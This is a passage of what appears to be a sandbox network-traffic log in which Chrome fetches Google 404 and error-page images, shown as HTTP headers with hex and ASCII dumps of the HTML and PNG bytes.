                                                                                                                                                                                                                                                                                          2024-09-27 14:41:06 UTC102INData Raw: 48 54 54 50 2f 31 2e 30 20 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 2d 6f 75 74 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: HTTP/1.0 408 Request Time-outCache-Control: no-cacheConnection: closeContent-Type: text/html
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:06 UTC110INData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 69 64 6e 27 74 20 73 65 6e 64 20 61 20 63 6f 6d 70 6c 65 74 65 20 72 65 71 75 65 73 74 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                          Data Ascii: <html><body><h1>408 Request Time-out</h1>Your browser didn't send a complete request in time.</body></html>


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          15192.168.2.749752142.250.186.1744435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:09 UTC685OUTGET /404/ HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Referer: https://tasty-library.surge.sh/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:09 UTC231INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                          Content-Length: 1565
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:09 GMT
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:09 UTC1159INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65
                                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-se
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:09 UTC406INData Raw: 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 20 20
                                                                                                                                                                                                                                                                                          Data Ascii: .google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a>


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          16192.168.2.749753142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:10 UTC751OUTGET /images/branding/googlelogo/1x/googlelogo_color_150x54dp.png HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Referer: https://google.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:10 UTC671INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 3170
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:10 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:41:10 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: private, max-age=31536000
                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:10 UTC719INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 96 00 00 00 36 08 06 00 00 00 25 1d 60 0c 00 00 0c 29 49 44 41 54 78 da ed 5d 0b 70 54 d5 19 3e 98 6c 00 1f 88 da 97 b5 82 62 ad 14 28 48 76 37 20 44 37 f7 6e 08 38 83 a2 a5 b4 56 ab a5 48 5f 82 52 3b 53 1f 68 59 60 77 13 28 b6 d5 2a b6 4e 5f 52 ab 22 30 60 a9 2d e6 41 a9 1d 7c b4 2a 4e c5 fa 60 b0 a8 80 ec 6e 02 84 7b ef 26 90 84 6c ff 6f e0 0e 3b 9b ff de bd 8f 84 61 9a f3 cd 9c d9 64 ef dd 24 e7 f0 9d ff f1 fd ff b9 08 09 09 09 89 fe 89 e9 b1 dc e9 4a 9d 31 ae 2a 91 9d a1 d4 1a 37 2b 09 63 8e 9a d4 6f a0 a1 54 2f cf 7e 56 e4 72 03 84 84 84 13 44 eb da 47 a8 49 63 11 91 e7 e5 aa b8 d6 45 5f e7 ac 46 55 52 db a3 26 f4 df 55 25 8c a9 b1 58 ee 34 21 21 51 88 48 22 3b 91 c8 f4 1c 08 e3 65 28 49 63 07
                                                                                                                                                                                                                                                                                          Data Ascii: PNGIHDR6%`)IDATx]pT>lb(Hv7 D7n8VH_R;ShY`w(*N_R"0`-A|*N`n{&lo;ad$J1*7+coT/~VrDGIcE_FUR&U%X4!!QH";e(Ic
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:10 UTC1390INData Raw: df d8 08 c8 2f 44 6b db ae 38 9e 54 fd 99 be 7f 2b 7f f8 25 56 73 34 14 ce 44 43 1b 52 d1 60 a7 f5 5a 06 df c2 e6 05 c1 bc 0a a2 1f 30 13 5b 29 4e 21 a4 ab 83 95 19 25 fc 3e 26 ec 62 ec 24 92 4d 12 0e d1 d1 50 1a 21 c2 fc 97 21 92 1d c1 de 27 4b 76 a5 e3 b5 4e 64 af a1 b5 6d 76 52 fa 3a 96 4c e9 0b e8 eb 77 0b af 79 25 d6 8e 69 9f 1f 48 eb f2 b0 bb 75 0c d5 ef 89 86 cf 73 dd 53 65 31 b1 5b c5 29 02 22 c7 cd 29 25 d8 85 49 ba 1d d8 91 f8 bc 28 82 23 4d 81 d9 34 ba 40 16 b7 03 9f 23 17 f9 cd e2 1b 58 9f e7 84 50 3c c1 fc 13 6b df 94 b1 67 a4 95 f0 16 4f eb a8 86 df 49 a9 13 3e 2d 9c 02 a2 27 1f 5f e9 51 e1 12 54 ea 79 0f 3d 5a 9e 47 52 7b 5d 14 80 26 74 7d 2a 1a ee c6 e4 bc 8e 94 12 3e 4a 04 9b 21 2c d0 d9 58 36 f3 48 43 a0 1b 24 f1 3a 8e 7d be ec 7a bb da
                                                                                                                                                                                                                                                                                          Data Ascii: /Dk8T+%Vs4DCR`Z0[)N!%>&b$MP!!'KvNdmvR:Lwy%iHusSe1[)")%I(#M4@#XP<kgOI>-'_QTy=ZGR{]&t}*>J!,X6HC$:}z
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:10 UTC1061INData Raw: ab 50 1a 37 9a 50 9e f0 62 0d d1 67 44 a4 6d b3 e8 52 9d 27 0a 80 0c 90 57 cf 83 f3 85 03 40 9a e0 3e 0f 51 30 cf 8d 8d 03 11 18 1d ea 36 e1 00 74 df 9d 6c 69 a7 3e 30 e6 84 85 36 ca 2d d6 73 a1 28 82 e0 63 b9 00 e9 89 af f4 89 40 0a 0f a0 56 28 a2 38 b0 c9 6f 43 dc d5 5c 13 1c e9 cf 25 26 8c 47 6d ca 2e 59 22 c2 4f 6a e2 6d 17 8a 22 40 f0 8a 62 36 7a 8b ac 7f 9e be d1 aa ac 01 cd 89 31 dd 5d e8 11 2a a2 5f cd c6 7d 4c 91 f5 2f 8c 5c d0 c8 65 75 d4 ad 60 2b 09 a0 9b 81 eb 86 a0 f7 36 89 02 70 f3 c7 b9 4d 25 ae 7f dd f6 54 53 42 fb 83 df 92 8e 29 2b c0 42 31 e4 6a a6 8e 85 b1 c2 06 a8 bf a2 62 61 66 d4 10 4f 1d 5a 2f 9e 10 78 4a 4c d1 56 8e b8 b1 15 19 0b 74 19 f4 c6 a3 be 88 7e 23 fa ec 7c 94 2c 68 61 76 db fd 0c ec c6 48 2c 6d 29 b4 c1 6a 99 b2 03 33 d6
                                                                                                                                                                                                                                                                                          Data Ascii: P7PbgDmR'W@>Q06tli>06-s(c@V(8oC\%&Gm.Y"Ojm"@b6z1]*_}L/\eu`+6pM%TSB)+B1jbafOZ/xJLVt~#|,havH,m)j3


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          17192.168.2.749754142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:10 UTC715OUTGET /images/errors/robot.png HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Referer: https://google.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:10 UTC683INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 6327
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Date: Thu, 26 Sep 2024 08:11:43 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 26 Sep 2025 08:11:43 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT
                                                                                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                                                                                          Age: 109767
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:10 UTC707INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 ab 00 00 00 d5 08 03 00 00 00 1f 1e f0 9a 00 00 00 57 50 4c 54 45 9d c7 ed 7a b3 e7 7a b3 e8 d4 e6 f7 9e c7 ee 32 8a db bb d8 f3 ba d8 f3 bb d8 f4 57 9f e1 7b b3 e8 56 9e e1 d4 e6 f8 d3 e6 f7 7a b2 e7 e9 f3 fb 32 89 da 33 8a db ea f3 fc 56 9f e1 32 8a da 9d c6 ed 9e c7 ed d3 e5 f7 ba d7 f3 e9 f2 fb ea f3 fb 57 9f e2 ff ff ff 3e 60 10 a0 00 00 00 1d 74 52 4e 53 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 59 86 e7 6a 00 00 17 f2 49 44 41 54 78 01 b5 c1 07 42 63 49 0c 40 41 a9 73 ff e4 48 58 e9 dd ff 9c 6b c3 30 63 1b 93 0c 54 09 3f 6e c5 2f 11 7e d6 14 97 1e 62 8c fc 02 e1 47 4d de 47 75 cf 63 e4 e7 09 3f aa 7b 35 88 35 b8 cc fc 34 e1 27 15 6f 3c 93 1c f8 69
                                                                                                                                                                                                                                                                                          Data Ascii: PNGIHDRWPLTEzz2W{Vz23V2W>`tRNSYjIDATxBcI@AsHXk0cT?n/~bGMGuc?{554'o<i
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:10 UTC1390INData Raw: 27 36 a7 9e 7b 28 3c b9 9b b9 85 70 93 e8 06 c3 3a f1 be e6 21 3d 80 d5 bb 31 87 66 fc 11 22 b7 10 6e f2 38 02 da 8d 0f c4 a2 7e 6f b3 bb 4e fc 33 6c b9 85 70 13 5b 0c a6 c4 c1 2a 0a ef 89 da 93 18 a7 a4 72 0b e1 36 8b f1 ac 7a de 14 ae 28 91 67 31 71 41 85 5b 08 9f 11 8b 71 c6 76 2b 9e d8 26 e7 1c b8 42 7b e1 49 8b 5c f0 ca 2d 84 0f c5 ba f4 ec 89 53 d1 79 26 fb bc d9 0b d7 a8 17 8e 4a e2 82 57 6e 21 7c 44 dc bd 98 e4 99 13 e6 2b 9e 14 cf 79 b7 e5 1a d3 1c 39 a8 81 0b c3 1d b7 10 3e 20 eb 6a 1c c8 c6 f8 c7 b4 f1 a4 b8 7b e4 0d c1 0d b8 4b 5c 58 16 6e 21 bc af 65 e5 49 19 2b 27 c6 ca b3 87 6a bc c5 b2 00 2d 70 41 95 5b 08 ef 32 1f 8c a3 38 67 e7 44 4f bc 23 a9 3f 70 10 06 20 05 2e 8c c2 2d 84 77 35 e7 89 64 f7 81 13 bb ca db 34 e7 ec 1c c4 6e d0 9c 0b 21
                                                                                                                                                                                                                                                                                          Data Ascii: '6{(<p:!=1f"n8~oN3lp[*r6z(g1qA[qv+&B{I\-Sy&JWn!|D+y9> j{K\Xn!eI+'j-pA[28gDO#?p .-w5d4n!
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:10 UTC1390INData Raw: 05 d5 c6 51 4b c5 78 43 09 6b 77 31 6e 24 bc a6 ce 1f 75 1c bd 6e 39 30 1e 24 ea c2 13 db 45 2e d9 10 7a 89 1c a4 94 a2 71 5d 7c 18 dd 0b b7 11 5e 8b 63 e2 49 49 36 85 4d d0 a0 1a 7a 1e e3 ca 2b 47 e6 89 2b 24 04 a9 1c 58 d2 12 b9 ce 4a c8 43 04 e6 b8 e2 6b 84 2b 64 9c 01 4b 21 02 2a 83 fa 2e 94 58 13 77 0b 47 d6 13 57 59 0a 5a b7 06 94 94 9a 71 9d 8c 9b 30 0d 29 f2 45 c2 15 31 14 26 19 1a 07 26 40 13 c0 02 d1 13 47 cb 23 6f b0 a2 21 84 95 41 ac 22 91 2b ac 8c 7d b3 5b 1e f9 2a e1 9a fb 2c 65 e2 49 14 20 2a 07 52 79 f4 c8 41 6f bc 6d 5b 54 43 6a 60 55 52 31 4e 59 15 df 6c b4 46 6a e0 ab 84 ab 8a eb 5d e4 a8 0a 10 07 8e ea 14 3d eb 90 24 2f bc 2f a6 10 c2 0a 5b b5 54 66 5e 44 f5 bc c9 a1 19 d0 94 af 12 ae 6b da 47 2d c5 56 8b 01 35 71 d4 c6 30 88 4a 48 3d
                                                                                                                                                                                                                                                                                          Data Ascii: QKxCkw1n$un90$E.zq]|^cII6Mz+G+$XJCk+dK!*.XwGWYZq0)E1&&@G#o!A"+}[*,eI *RyAom[TCj`UR1NYlFj]=$//[Tf^DkG-V5q0JH=
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:10 UTC1390INData Raw: 1f 7a f4 ec 7d e6 2d 51 67 4e a5 ac 5c 30 30 71 0f de 5b b8 07 cc c5 38 b0 31 44 03 84 d7 4c 1b 78 01 9a 72 90 bc f1 09 51 c2 66 3f 84 66 5c 15 84 53 16 02 6f 88 9e 47 37 cc d3 96 a3 28 d9 9b 81 f0 5a 15 48 0b 10 83 01 96 85 3f 6c 9e 92 06 e3 2d 71 f0 9e d7 21 99 71 c2 cc c0 c6 ca 19 49 bc a9 f9 e8 0c f7 3c 69 2e e2 15 10 5e a9 0b c4 60 60 1e 81 d5 30 f0 87 79 77 0f dd b7 bc 29 ca 10 f6 bd 8f 69 e2 45 eb c1 2b 84 3b ce 14 e5 1d 32 78 36 8e 82 37 cc 77 06 c2 2b 21 42 52 b0 70 0f 4c be 18 2f 54 63 35 f3 02 36 f3 a6 47 0d 3e 66 6f 5b 8e cc 83 f9 18 d1 c4 3f 36 63 91 f7 44 cf 62 40 08 11 30 15 10 2e 15 81 38 18 54 01 4c 83 71 14 ff 03 06 0f bd d7 5c b1 e0 c3 7f bc ad ca ac 79 2d 1c 8d 0d 59 cf a4 60 bc 88 a1 f0 91 69 93 13 44 e7 c8 c2 00 c2 05 0b 11 e4 11 18
                                                                                                                                                                                                                                                                                          Data Ascii: z}-QgN\00q[81DLxrQf?f\SoG7(ZH?l-q!qI<i.^``0yw)iE+;2x67w+!BRpL/Tc56G>fo[?6cDb@0.8TLq\y-Y`iD
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:10 UTC1390INData Raw: 7a 00 e2 58 78 62 b5 cf bc 4d f8 a7 5a 5d f9 c4 57 cc a3 6d 07 35 2e d4 ae fc 11 bd 1b d8 ae 01 65 a7 de fb 7e 48 c6 1f 41 ad 89 ee 2b cf 6a af bc 4d 78 21 e3 7a 93 3d 0f ad 24 89 ab 15 ac f8 98 05 81 41 38 97 bc 67 e5 8f ba 1e 1f 30 55 20 ad f3 fd e3 1c c5 c3 96 67 c1 d7 3e ba 73 30 27 98 5d 78 9b f0 47 cd e3 22 79 3f a6 c1 47 7f 92 e2 8a 0f cc 6d b3 80 04 4e 58 94 ae 53 71 35 9e c9 5e e1 ce 1b a9 6b e5 c0 dc 57 3c 9b 53 69 b6 04 0e da ba 80 27 de 26 fc e1 79 b6 92 37 01 6c 1b a5 25 a9 3e 7a 08 d5 8c b7 ac da d8 93 c1 e4 c6 3f 45 3d cc 10 47 bf 33 9e 14 0f ff 31 04 5c d8 72 60 a9 71 22 7a 03 6c c8 13 0c 0b 7f cd c5 38 23 1c 95 41 7a dd aa e7 2c fc 13 eb e0 e3 6e b7 a4 d9 78 cd d4 3d a4 b4 34 ee 47 e3 85 dd 29 c6 51 ec d9 1f 23 47 ad ef 28 bd f9 03 4f a2
                                                                                                                                                                                                                                                                                          Data Ascii: zXxbMZ]Wm5.e~HA+jMx!z=$A8g0U g>s0']xG"y?GmNXSq5^kW<Si'&y7l%>z?E=G31\r`q"zl8#Az,nx=4G)Q#G(O
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:10 UTC60INData Raw: df 25 fc aa e8 62 40 d2 9c 8c ef 12 7e d7 a4 63 35 93 f5 3e f2 6d c2 6f 2b 7d 18 46 99 f9 3e e1 d7 d9 5c b6 fc 84 ff 01 4e de f0 b9 5c 13 aa be 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                                                          Data Ascii: %b@~c5>mo+}F>\N\IENDB`


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          18192.168.2.749755142.250.186.1324435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:11 UTC482OUTGET /images/branding/googlelogo/1x/googlelogo_color_150x54dp.png HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:11 UTC671INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 3170
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:11 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:41:11 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: private, max-age=31536000
                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:11 UTC719INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 96 00 00 00 36 08 06 00 00 00 25 1d 60 0c 00 00 0c 29 49 44 41 54 78 da ed 5d 0b 70 54 d5 19 3e 98 6c 00 1f 88 da 97 b5 82 62 ad 14 28 48 76 37 20 44 37 f7 6e 08 38 83 a2 a5 b4 56 ab a5 48 5f 82 52 3b 53 1f 68 59 60 77 13 28 b6 d5 2a b6 4e 5f 52 ab 22 30 60 a9 2d e6 41 a9 1d 7c b4 2a 4e c5 fa 60 b0 a8 80 ec 6e 02 84 7b ef 26 90 84 6c ff 6f e0 0e 3b 9b ff de bd 8f 84 61 9a f3 cd 9c d9 64 ef dd 24 e7 f0 9d ff f1 fd ff b9 08 09 09 09 89 fe 89 e9 b1 dc e9 4a 9d 31 ae 2a 91 9d a1 d4 1a 37 2b 09 63 8e 9a d4 6f a0 a1 54 2f cf 7e 56 e4 72 03 84 84 84 13 44 eb da 47 a8 49 63 11 91 e7 e5 aa b8 d6 45 5f e7 ac 46 55 52 db a3 26 f4 df 55 25 8c a9 b1 58 ee 34 21 21 51 88 48 22 3b 91 c8 f4 1c 08 e3 65 28 49 63 07
